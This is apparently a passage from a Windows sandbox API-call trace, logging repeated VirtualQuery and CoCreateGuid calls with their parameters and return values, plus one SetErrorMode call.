	[0299.465] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.466] VirtualQuery (in: lpAddress=0x1cbe60, lpBuffer=0x1ccd20, dwLength=0x30 | out: lpBuffer=0x1ccd20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.466] VirtualQuery (in: lpAddress=0x1cbaa0, lpBuffer=0x1cc960, dwLength=0x30 | out: lpBuffer=0x1cc960*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.466] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.466] VirtualQuery (in: lpAddress=0x1cbe60, lpBuffer=0x1ccd20, dwLength=0x30 | out: lpBuffer=0x1ccd20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.466] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.466] VirtualQuery (in: lpAddress=0x1cbe60, lpBuffer=0x1ccd20, dwLength=0x30 | out: lpBuffer=0x1ccd20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.466] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0xcd978106, Data2=0x3789, Data3=0x4ef3, Data4=([0]=0x87, [1]=0x6b, [2]=0x50, [3]=0x7e, [4]=0xba, [5]=0xf6, [6]=0x2f, [7]=0xaa))) returned 0x0
	[0299.466] VirtualQuery (in: lpAddress=0x1cb660, lpBuffer=0x1cc520, dwLength=0x30 | out: lpBuffer=0x1cc520*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.467] VirtualQuery (in: lpAddress=0x1cb6f0, lpBuffer=0x1cc5b0, dwLength=0x30 | out: lpBuffer=0x1cc5b0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.467] VirtualQuery (in: lpAddress=0x1cb910, lpBuffer=0x1cc7d0, dwLength=0x30 | out: lpBuffer=0x1cc7d0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.467] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x5dd449b5, Data2=0x635d, Data3=0x46d1, Data4=([0]=0x82, [1]=0xb6, [2]=0xe9, [3]=0xdf, [4]=0xf1, [5]=0xe4, [6]=0xb4, [7]=0xf0))) returned 0x0
	[0299.467] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x792c99bb, Data2=0x614b, Data3=0x4f6c, Data4=([0]=0x86, [1]=0x95, [2]=0xf9, [3]=0x43, [4]=0x23, [5]=0x92, [6]=0x1c, [7]=0x56))) returned 0x0
	[0299.467] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x1a4276a4, Data2=0xf169, Data3=0x48c7, Data4=([0]=0xb3, [1]=0x3a, [2]=0x43, [3]=0xa8, [4]=0x80, [5]=0x8, [6]=0x8, [7]=0xb8))) returned 0x0
	[0299.467] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x2815f4a5, Data2=0xcae9, Data3=0x490a, Data4=([0]=0x84, [1]=0x2d, [2]=0x28, [3]=0x81, [4]=0x76, [5]=0x15, [6]=0xbd, [7]=0xa6))) returned 0x0
	[0299.467] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x2b1610, Data2=0x29e9, Data3=0x4ba9, Data4=([0]=0x83, [1]=0xf4, [2]=0x9f, [3]=0x25, [4]=0x99, [5]=0x2f, [6]=0xba, [7]=0xef))) returned 0x0
	[0299.468] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0xed2da94f, Data2=0xd356, Data3=0x4b15, Data4=([0]=0xb5, [1]=0x1d, [2]=0x91, [3]=0x3, [4]=0xc, [5]=0x2c, [6]=0xa6, [7]=0xae))) returned 0x0
	[0299.468] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0xcf6602fc, Data2=0x564d, Data3=0x44d3, Data4=([0]=0xb2, [1]=0xe0, [2]=0x81, [3]=0x73, [4]=0xfc, [5]=0xfc, [6]=0x20, [7]=0x40))) returned 0x0
	[0299.468] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x17e83967, Data2=0xd082, Data3=0x491f, Data4=([0]=0xbe, [1]=0xa3, [2]=0x65, [3]=0x0, [4]=0xc8, [5]=0x28, [6]=0x4e, [7]=0xa6))) returned 0x0
	[0299.468] VirtualQuery (in: lpAddress=0x1cb4d0, lpBuffer=0x1cc390, dwLength=0x30 | out: lpBuffer=0x1cc390*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.468] VirtualQuery (in: lpAddress=0x1cb4d0, lpBuffer=0x1cc390, dwLength=0x30 | out: lpBuffer=0x1cc390*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.468] VirtualQuery (in: lpAddress=0x1cb560, lpBuffer=0x1cc420, dwLength=0x30 | out: lpBuffer=0x1cc420*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.468] VirtualQuery (in: lpAddress=0x1cb4d0, lpBuffer=0x1cc390, dwLength=0x30 | out: lpBuffer=0x1cc390*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.468] VirtualQuery (in: lpAddress=0x1cb560, lpBuffer=0x1cc420, dwLength=0x30 | out: lpBuffer=0x1cc420*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.468] VirtualQuery (in: lpAddress=0x1cb4d0, lpBuffer=0x1cc390, dwLength=0x30 | out: lpBuffer=0x1cc390*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.469] VirtualQuery (in: lpAddress=0x1cb560, lpBuffer=0x1cc420, dwLength=0x30 | out: lpBuffer=0x1cc420*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.469] VirtualQuery (in: lpAddress=0x1cb4d0, lpBuffer=0x1cc390, dwLength=0x30 | out: lpBuffer=0x1cc390*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.469] VirtualQuery (in: lpAddress=0x1cb560, lpBuffer=0x1cc420, dwLength=0x30 | out: lpBuffer=0x1cc420*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.469] VirtualQuery (in: lpAddress=0x1cb4d0, lpBuffer=0x1cc390, dwLength=0x30 | out: lpBuffer=0x1cc390*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.469] VirtualQuery (in: lpAddress=0x1cb560, lpBuffer=0x1cc420, dwLength=0x30 | out: lpBuffer=0x1cc420*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.469] VirtualQuery (in: lpAddress=0x1cb4d0, lpBuffer=0x1cc390, dwLength=0x30 | out: lpBuffer=0x1cc390*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.469] VirtualQuery (in: lpAddress=0x1cb560, lpBuffer=0x1cc420, dwLength=0x30 | out: lpBuffer=0x1cc420*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.469] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.469] VirtualQuery (in: lpAddress=0x1cbe60, lpBuffer=0x1ccd20, dwLength=0x30 | out: lpBuffer=0x1ccd20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.470] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.470] VirtualQuery (in: lpAddress=0x1cbe60, lpBuffer=0x1ccd20, dwLength=0x30 | out: lpBuffer=0x1ccd20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.470] VirtualQuery (in: lpAddress=0x1cbe60, lpBuffer=0x1ccd20, dwLength=0x30 | out: lpBuffer=0x1ccd20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.470] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.470] VirtualQuery (in: lpAddress=0x1cbe60, lpBuffer=0x1ccd20, dwLength=0x30 | out: lpBuffer=0x1ccd20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.470] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0xffd99370, Data2=0x1d74, Data3=0x4d4b, Data4=([0]=0x93, [1]=0xc7, [2]=0x1b, [3]=0x11, [4]=0x41, [5]=0xf1, [6]=0xf6, [7]=0xfd))) returned 0x0
	[0299.470] VirtualQuery (in: lpAddress=0x1cbde0, lpBuffer=0x1ccca0, dwLength=0x30 | out: lpBuffer=0x1ccca0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.470] VirtualQuery (in: lpAddress=0x1cbde0, lpBuffer=0x1ccca0, dwLength=0x30 | out: lpBuffer=0x1ccca0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.470] VirtualQuery (in: lpAddress=0x1cbe70, lpBuffer=0x1ccd30, dwLength=0x30 | out: lpBuffer=0x1ccd30*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.470] VirtualQuery (in: lpAddress=0x1cbde0, lpBuffer=0x1ccca0, dwLength=0x30 | out: lpBuffer=0x1ccca0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.470] VirtualQuery (in: lpAddress=0x1cbe70, lpBuffer=0x1ccd30, dwLength=0x30 | out: lpBuffer=0x1ccd30*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.471] VirtualQuery (in: lpAddress=0x1cbde0, lpBuffer=0x1ccca0, dwLength=0x30 | out: lpBuffer=0x1ccca0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.471] VirtualQuery (in: lpAddress=0x1cbe70, lpBuffer=0x1ccd30, dwLength=0x30 | out: lpBuffer=0x1ccd30*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.471] VirtualQuery (in: lpAddress=0x1cbde0, lpBuffer=0x1ccca0, dwLength=0x30 | out: lpBuffer=0x1ccca0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.471] VirtualQuery (in: lpAddress=0x1cbe70, lpBuffer=0x1ccd30, dwLength=0x30 | out: lpBuffer=0x1ccd30*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.471] VirtualQuery (in: lpAddress=0x1cbde0, lpBuffer=0x1ccca0, dwLength=0x30 | out: lpBuffer=0x1ccca0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.471] VirtualQuery (in: lpAddress=0x1cbe70, lpBuffer=0x1ccd30, dwLength=0x30 | out: lpBuffer=0x1ccd30*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.471] VirtualQuery (in: lpAddress=0x1cbde0, lpBuffer=0x1ccca0, dwLength=0x30 | out: lpBuffer=0x1ccca0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.471] VirtualQuery (in: lpAddress=0x1cbe70, lpBuffer=0x1ccd30, dwLength=0x30 | out: lpBuffer=0x1ccd30*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.471] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.471] VirtualQuery (in: lpAddress=0x1cbe60, lpBuffer=0x1ccd20, dwLength=0x30 | out: lpBuffer=0x1ccd20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.472] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.472] VirtualQuery (in: lpAddress=0x1cbe60, lpBuffer=0x1ccd20, dwLength=0x30 | out: lpBuffer=0x1ccd20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.472] VirtualQuery (in: lpAddress=0x1cbe60, lpBuffer=0x1ccd20, dwLength=0x30 | out: lpBuffer=0x1ccd20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.472] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.472] VirtualQuery (in: lpAddress=0x1cbe60, lpBuffer=0x1ccd20, dwLength=0x30 | out: lpBuffer=0x1ccd20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.472] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0xcc170758, Data2=0xe7f, Data3=0x4247, Data4=([0]=0x83, [1]=0x5f, [2]=0x87, [3]=0x4a, [4]=0xb1, [5]=0x90, [6]=0x4c, [7]=0xb3))) returned 0x0
	[0299.472] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.472] VirtualQuery (in: lpAddress=0x1cbe60, lpBuffer=0x1ccd20, dwLength=0x30 | out: lpBuffer=0x1ccd20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.472] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.473] VirtualQuery (in: lpAddress=0x1cbe60, lpBuffer=0x1ccd20, dwLength=0x30 | out: lpBuffer=0x1ccd20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.473] VirtualQuery (in: lpAddress=0x1cbe60, lpBuffer=0x1ccd20, dwLength=0x30 | out: lpBuffer=0x1ccd20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.473] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.473] VirtualQuery (in: lpAddress=0x1cbe60, lpBuffer=0x1ccd20, dwLength=0x30 | out: lpBuffer=0x1ccd20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.473] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.473] VirtualQuery (in: lpAddress=0x1cbe60, lpBuffer=0x1ccd20, dwLength=0x30 | out: lpBuffer=0x1ccd20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.473] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.473] VirtualQuery (in: lpAddress=0x1cbe60, lpBuffer=0x1ccd20, dwLength=0x30 | out: lpBuffer=0x1ccd20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.473] VirtualQuery (in: lpAddress=0x1cbaa0, lpBuffer=0x1cc960, dwLength=0x30 | out: lpBuffer=0x1cc960*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.473] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.473] VirtualQuery (in: lpAddress=0x1cbe60, lpBuffer=0x1ccd20, dwLength=0x30 | out: lpBuffer=0x1ccd20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.474] VirtualQuery (in: lpAddress=0x1cbdd0, lpBuffer=0x1ccc90, dwLength=0x30 | out: lpBuffer=0x1ccc90*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.474] VirtualQuery (in: lpAddress=0x1cbe60, lpBuffer=0x1ccd20, dwLength=0x30 | out: lpBuffer=0x1ccd20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.474] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0xbcf2c14e, Data2=0x45d9, Data3=0x460e, Data4=([0]=0x9d, [1]=0xf6, [2]=0x4e, [3]=0x9b, [4]=0xf9, [5]=0xa, [6]=0x9d, [7]=0x44))) returned 0x0
	[0299.474] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x2208e265, Data2=0x7882, Data3=0x4ddb, Data4=([0]=0xbb, [1]=0x14, [2]=0xfd, [3]=0x47, [4]=0x19, [5]=0x1d, [6]=0xcb, [7]=0x82))) returned 0x0
	[0299.474] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0xb477ce49, Data2=0xa7bb, Data3=0x4e28, Data4=([0]=0x95, [1]=0x33, [2]=0x51, [3]=0xe1, [4]=0xa1, [5]=0x13, [6]=0xa2, [7]=0xa9))) returned 0x0
	[0299.474] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0xeeaaedba, Data2=0xaec8, Data3=0x40d4, Data4=([0]=0xb1, [1]=0x29, [2]=0x15, [3]=0x47, [4]=0x46, [5]=0x3a, [6]=0xc6, [7]=0x1c))) returned 0x0
	[0299.474] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x726e251f, Data2=0x300, Data3=0x4400, Data4=([0]=0x99, [1]=0x0, [2]=0xdb, [3]=0xfa, [4]=0x4a, [5]=0x96, [6]=0x78, [7]=0xd9))) returned 0x0
	[0299.474] VirtualQuery (in: lpAddress=0x1cbbb0, lpBuffer=0x1cca70, dwLength=0x30 | out: lpBuffer=0x1cca70*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.474] VirtualQuery (in: lpAddress=0x1cbc40, lpBuffer=0x1ccb00, dwLength=0x30 | out: lpBuffer=0x1ccb00*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0299.474] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x356b5bd2, Data2=0x1a3e, Data3=0x43a9, Data4=([0]=0xaf, [1]=0x2c, [2]=0x99, [3]=0xea, [4]=0x4d, [5]=0xba, [6]=0xa7, [7]=0x30))) returned 0x0
	[0299.475] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x2bd66730, Data2=0x6a43, Data3=0x4440, Data4=([0]=0xa7, [1]=0xfe, [2]=0x49, [3]=0x6b, [4]=0x33, [5]=0x63, [6]=0xca, [7]=0x10))) returned 0x0
	[0299.475] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x8b6e964c, Data2=0x6f87, Data3=0x4710, Data4=([0]=0xa6, [1]=0xf0, [2]=0xaa, [3]=0x24, [4]=0x58, [5]=0x25, [6]=0x30, [7]=0xf1))) returned 0x0
	[0299.475] SetErrorMode (uMode=0x1) returned 0x1
